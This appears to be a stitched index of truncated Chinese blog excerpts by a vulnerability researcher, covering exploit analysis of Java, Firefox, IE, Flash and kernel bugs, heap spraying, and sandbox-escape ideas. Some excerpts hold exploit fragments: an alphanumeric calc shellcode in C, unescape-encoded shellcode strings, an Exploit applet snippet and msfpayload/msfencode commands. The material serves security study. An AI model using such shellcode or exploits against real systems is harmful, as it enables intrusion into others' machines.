爱杀之爪的矩阵

http://bbs.360safe.com/thread-111959-1-1.htmliocode 0x222020 .text:000110C6 ; int __stdcall sub_110C6(int processid).text:000110C6 sub_110C6       proc near               ; CODE XREF:

adobe pdf的sandbox貌似是不会限制socket的，某技术paper上面说的这样感觉可以利用第三方程序的本地socket的漏洞来绕过sandbox。例如某某播放软件本地开了一个127.0.0.1的链接，存在溢出漏洞，这样假如你有了pdf的漏洞后，执行shellcode后，在和本地链接通信，从而再次溢出第三方程序，从而在第三方陈程序的进程空间执行任意代码，

大家都知道在进行漏洞分析时，对于内存破坏或者其他很难定位类型的漏洞分析中，一个很难解决的就是数据的逆向溯源，等找到源头之后，大都就知道漏洞触发的原因了 可以用虚拟机快照来解决这个问题，发现无论是r3下面的漏洞分析还是内核的漏洞，都非常给力啊  在分析的开始，就保存一个虚拟机快照，每次重新分析时，就直接恢复快照，因为知道了 堆的地址，可以直接下堆的访问断点等，就算当前

NtQueryIntervalProfile函数是为了触发shellcode的执行eax=b25c9d14 ebx=80618501 ecx=00000000 edx=0021fb0c esi=00bcd968 edi=b25c9d64eip=80646d91 esp=b25c9d04 ebp=b25c9d20 iopl=0         nv up ei pl nz na pe nc

第一次载入poc crash在这eax=00000000 ebx=00000000 ecx=0000006b edx=e16edaac esi=00000244 edi=00000000eip=8053af99 esp=b264e948 ebp=b264e94c iopl=0 nv up ei pl zr na pe nccs=0008 ss=0010 ds=0023

见图如见bug....怎么解决呢？ 当执行到这条指令之后的时候，手动设置当前esp指向的内容为01930001 (如何设置这个值？记录下每次指令的地址，发现了fstenv后，找到上一个浮点指令的地址就OK......)这样pop eax 之后 eax便是正确的自定位地址了....自修改支持 cmd line ：   pin.bat -smc_strict 1 --

一 kernel 漏洞 的空指针引用 利用1. Trigger the NULL pointer dereference for a denial of service.2. Use the zero page to get control over EIP/RIP.第三章那个内核漏洞的利用真是经典啊二  开源系统的系统驱动漏洞查找  Step 1: List the

关键词：堆喷射 为什么火狐3.6.3以后喷不到0c0c0c0c？对于http://www.exploit-db.com/exploits/17974/ 这个火狐的整数溢出的poc在火狐3.6.16上面可以正常运行但是在火狐3.6.3及其以后的版本堆喷射死活喷不到0x0c0c0c0c处。原因有两个：1 火狐的huge堆分配内存对齐火狐的堆分成三类： * |==

额 程序是不能安装在根目录的啊 千万啊例如python，直接安装在c盘根目录，尤其是服务器这样做，风险很大，很容易导致提权......最近在看一本书，据说是神书！we can do anything！

这个 Luigi Auriemma 大牛 挖各种远程开端口软件的漏洞啊 ,牛叉...没事看下他挖的几个关于HP 3COM/H3C Intelligent Management 的漏洞 ，不用补丁对比，自己跟着看了一遍，当然了  是猜测 并不一定正确。CVE-2011-1851.text:0040AA05 loc_40AA05:

Cve2012-0507分析 影响版本Jre update 30 before  触发漏洞代码 public class Exploit extends Applet{  publicvoid init()  {    try    {//manually constructing aserialized object      by

http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/

漏洞分析http://www.binvul.com/viewthread.php?tid=134&extra=page%3D1

引用http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/ 漏洞poc  漏洞原理： Applet有2个标签参数，codebase和code，c

1: kd> pwin32k!ReadLayoutFile+0x123:bf89edb7 7407            je      win32k!ReadLayoutFile+0x12c (bf89edc0)1: kd> pwin32k!ReadLayoutFile+0x125:bf89edb9 0fb703          movzx   eax,word ptr [

先选择一个虚拟机快照的分析开始点，这个点要把握好，堆的布局基本定了，不再改变然后直接运行poc，在崩溃地方，下这个断点Flash11e+0x5261c0:022> u Flash11e+0x5261cFlash11e+0x5261c:053c261c 8bb614050000    mov     esi,dword ptr +0x513 (00000514)[es

Java 漏洞调试科普Cve2010-0840 author : instruder 介绍以cve2010-0840的Java Runtime Environment Trusted Methods Chaining Remote CodeExecution Vulnerability漏洞为例，介绍下如何调试java漏洞。 这个漏洞影响的java版本 Jre

cve 2010-0842Oracle Java MixerSequencer Object GM_Song Structure Handling Vulnerability 分析没啥难度这个…目的不在分析，呵呵 Instruderversion： jre 6u18  设置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT

asm in ntdll.dll7C94A994 3B5D F8 CMP EBX,DWORD PTR SS:[EBP-8] ; 堆栈顶部7C94A997 ^ 0F82 79F9FFFF JB ntdll.7C94A3167C94A99D 8D43 08 LEA EAX,DWORD PTR DS:[EBX+8]7C94A

在这之前先构造eax指向下面的位置.... str+=unescape("%u0050%u0004") //push eax add al,7cstr+=unescape("%u007c%u0004") //add al,74str+=unescape("%u0074%u0050") //push eax pop ebxstr+=unescape("%u005b%u0058")

<br />首先看到 GNU gzip文件压缩工具 多个版本存在目录遍历漏洞 http://www.sudu.cn/info/html/edu/20080115/248563.html<br /> <br /> <br />很多程序在自己解压文件时应该都会存在这个问题 需要在今后的漏洞挖掘分析中注意到<br /> <br />该漏洞可能会导致非法创建文件 非法删除覆盖文件等操作 .<br /> <br />挖掘漏洞重要在于思路及了解到的漏洞形态;

<br /> <br />方法:<br />在安装目录/Metasploit/Framework3/home/Administrator/.msf3/”下面，添加完你的exploit后要先删除这个文件，然后重新启动整个程序<br /> <br />ruby太慢 受不了

<br /><br />外界攻击点：<br /> <br /> <br />1  低级的字符串 或缓冲拷贝操作<br /> <br />2  在外界的输入缓冲中进行指针运算<br /> <br />3  使用循环得到外来的数据<br /> <br />4  一些格式化函数<br /> <br />5  进行不正确(或没有进行)边界检查的函数<br /> <br />6  整数溢出或整数截断<br /> <br /> <br />一切外来的数据都是不可信的  打破程序设计的假设.<br /> <br /> <

<br />先看http://www.xfocus.net/articles/200211/459.html 老大写的这个文章<br /> <br />管道建立的时候采用空的acl导致在任何用户下都可以连接这个管道...<br /> <br />实际操作时发现不行 ,咋回事?<br /> <br />pipea = CreateNamedPipeA(pipename,<br />        PIPE_ACCESS_DUPLEX,<br />        PIPE_TYPE_MESSAGE|PI

重读0day利用书的第7章的堆 seh利用时发现在发生堆DWORD SHOOT时，我是xp sp3的系统总是不成功，才发现...7C930EF8    898D ECFEFFFF   MOV DWORD PTR SS:[EBP-114],ECX7C930EFE    8B39            MOV EDI,DWORD PTR DS:[ECX]                      ; 取seh处理函数7C930F00    3B78 04         CMP EDI,DWORD PTR DS

<br />........<br />01D0CE77    0FB701          MOVZX EAX,WORD PTR DS:[ECX]<br />01D0CE7A    66:8902         MOV WORD PTR DS:[EDX],AX<br />01D0CE7D    83C1 02         ADD ECX,2<br />01D0CE80    83C2 02         ADD EDX,2;UNICODE<br />01D0CE83    66:3BC3    

解决name 'Tkinter' is not defined 　　

<br />以后可能会一直搞这方面了，挺有意思的，今天在看雪找到了ExploitMe玩了下(08年的ExploitMe大赛的题目)<br />题目A很简单，简单的栈溢出就搞定了，题目B用到了ActiveX控件，基本没接触过，仔细学习了下<br /> <br />注册表查看ActiveX控件<br />HKEY_LOCAL_MACHINE/SOFTWARE/Classes/TypeLib/{7F5E27C1-4A5C-11D3-9232-0000B48A05B2}<br /> <br /> <br />//一

今天在分析exploit-db上面的actFax Server FTP Remote BOF (post auth) Bigger Buffer时，http://www.exploit-db.com/exploits/17373/顺带看了下有没别的可以利用的地

今天看一个软件的更新时 取的http头信息中的Content-length+1 作为内存分配，晚上测试了下 发现可以单独的更改http 头中的Content-length长度信息为0xffffffff。这样当长度+1时，即可导致分配0字节内存(实际上是8字节)。 后面在用Inte

擦 这种东西还是要记下的，不然外出出差电脑上没有这种资料，还要现场去百度搜索 太麻烦了....纠结  ruby ./msfpayload windows/messagebox EXITFUNC=seh TEXT="hack by instruder" TITLE=hack R >messageboxruby ./msfencode -i messagebox -b '\x00' -

常常挖掘漏洞时，先通过ida静态反汇编来查看程序的流程,具体污染源数据的处理等，有时找到了漏洞，但是用样本测试时却发现手头上面的样本根本执行不到触发漏洞的函数,这种尴尬让人情以何堪....方法: 对于文件类型的:先将漏洞函数的开头修改成int 3 指令保存

最近一直在挖掘XX player的漏洞本来打算找个可利用的漏洞(之前找了几个没能利用)就不搞了 换ie的分析和挖掘下(一直对used after free 类型的漏洞不知道怎么找):好不容易找了个潜在的堆溢出(为什么说是潜在的呢, 只能能执行到

从文件中取污染数据然后通过movsx来操作很容易出现问题，如果不加判断的话，好多文件类型的漏洞都是这么导致的，例如excel  pdf .. 而movzx威胁就小很多，但是同样不容易忽视，例如取污染数据movzx eax，[buffer+xx]  mo

CVE2011-0065-Mozilla Firefox3.6.16 mChannel use after free vulnerability Author: instruder of Code Audit Labs of vulnhunt.comTime: 201

asm in PowerEnterCABANK.ocx .text:10001500 bugfunc_retaddress_onebyte_write proc near ; CODE XREF: sub_100015A0+3Ep.text:10001500.tex

http://blog.youkuaiyun.com/zengwh/archive/2009/02/26/3938390.aspx几种垃圾回收算法 引用计数（ Reference Counting ）算法 1960 年以前，人们为胚胎中的 Lisp 语言设计垃圾收集机制时

夜深人静了，想想自己在漏洞利用方面做的太少了，基本都是找漏洞，很少利用，跟项目有关。搞了几晚上rop没搞定郁闷啊。就到exploit-db上面找个漏洞看看。这个ftp 写的比较烂  好几个命令都要问题 exploit-db上面发布的是list命令堆栈溢出，大致

<br />#include <stdio.h> #include <windows.h>//纯字符数字的shellcode，显示个calcchar aphal1[]={"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkVvqKRJ31PXrsOKtMFEk6cL9oKcFQIPPPmkFrHKNaQlYoXSjHIu9oyokOsSu1RLasfNQuPxPegps0A"};int main(int argc, char *